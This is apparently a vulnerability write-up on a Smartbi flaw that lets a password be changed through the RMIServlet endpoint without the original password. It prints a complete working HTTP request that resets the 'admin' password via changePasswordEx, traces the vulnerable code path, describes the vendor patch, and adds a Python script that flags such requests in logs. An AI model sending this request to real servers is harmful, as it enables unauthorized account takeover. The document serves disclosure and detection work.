Vulnerability Profile
Checking the patch package information published for Smartbi shows that, under certain circumstances, a user's password can be changed without authorization. Below is a brief reproduction and analysis.
Vulnerability reproduction
When changing a password through the web page, the original password of that user must be supplied.
By constructing the following packet directly, the original password is not needed: knowing only the user name is enough to change the password.
POST /smartbi/vision/RMIServlet HTTP/1.1
Host: 192.168.222.133:18080
Content-Length: 73
Cache-Control: max-age=0
If-Modified-Since: 0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
Accept: */*
Origin: http://192.168.222.133:18080
Referer: http://192.168.222.133:18080/smartbi/vision/index.jsp
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=4A4AC06EC1DF3CDDC45239C211926FA1
Connection: close
className=UserService&methodName=changePasswordEx&params=["admin","","1"]
Vulnerability Analysis
smartbi.usermanager.ILocalUserManagerModule#changePasswordEx
smartbi.usermanager.UserManagerModule#changePasswordEx
Although the password-change operation receives the user name, the original password and the new password, it does not perform any verification of the original password before applying the change.
The userId is looked up from the user name passed in the request, after which the update proceeds through:
smartbi.usermanager.UserManagerModule#updateUserEx
smartbi.usermanager.UserManagerModule#updateUserExtend
Bug fix
After uploading the patch package and resending the same packet, the request was intercepted.
The patch checks the incoming className and methodName; when they match the blocked pair, execution stops and the request is rejected.
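As an added example (not Smartbi code and not part of the original write-up), the following script triages RMIServlet request bodies the way a WAF rule or log-review job might: it parses the className/methodName/params fields shown in the packet above and flags changePasswordEx calls, with the empty-original-password case (the pattern the analysis describes) ranked highest. The params order of user name, original password, new password is assumed from the request shown; the sample bodies are constructed.

```python
import json
from urllib.parse import parse_qs

# Class/method pair named on the page; the vendor patch intercepts calls matching it.
WATCHED_CALL = ("UserService", "changePasswordEx")


def parse_rmi_body(body):
    """Split an RMIServlet form body into (className, methodName, params).

    params is the JSON array from the `params` field; malformed or non-array
    JSON returns None so the caller can flag it instead of silently ignoring it.
    """
    fields = parse_qs(body, keep_blank_values=True)
    class_name = fields.get("className", [""])[0]
    method_name = fields.get("methodName", [""])[0]
    try:
        params = json.loads(fields.get("params", [""])[0])
    except ValueError:
        return class_name, method_name, None
    return class_name, method_name, params if isinstance(params, list) else None


def triage_rmi_request(body):
    """Return a triage verdict for one body posted to /smartbi/vision/RMIServlet.

    'critical'  changePasswordEx with an empty original password (the bypass
                pattern from the analysis; argument order is an assumption)
    'review'    changePasswordEx with a non-empty original password; the
                unpatched server never checks it, so these still need review
    'malformed' changePasswordEx whose params are not a 3-element JSON array
    'ok'        any other call
    """
    class_name, method_name, params = parse_rmi_body(body)
    if (class_name, method_name) != WATCHED_CALL:
        return "ok"
    if params is None or len(params) < 3:
        return "malformed"
    _username, old_password, _new_password = params[:3]
    return "critical" if not old_password else "review"


# Constructed sample bodies modelled on the packet above; not real captures.
SAMPLE_BODIES = [
    'className=UserService&methodName=changePasswordEx&params=["admin","","1"]',
    'className=UserService&methodName=changePasswordEx&params=["alice","OldPw","NewPw"]',
    'className=UserService&methodName=getCurrentUser&params=[]',
    'className=UserService&methodName=changePasswordEx&params=[admin',
]

if __name__ == "__main__":
    for body in SAMPLE_BODIES:
        print(triage_rmi_request(body).ljust(9), body)
```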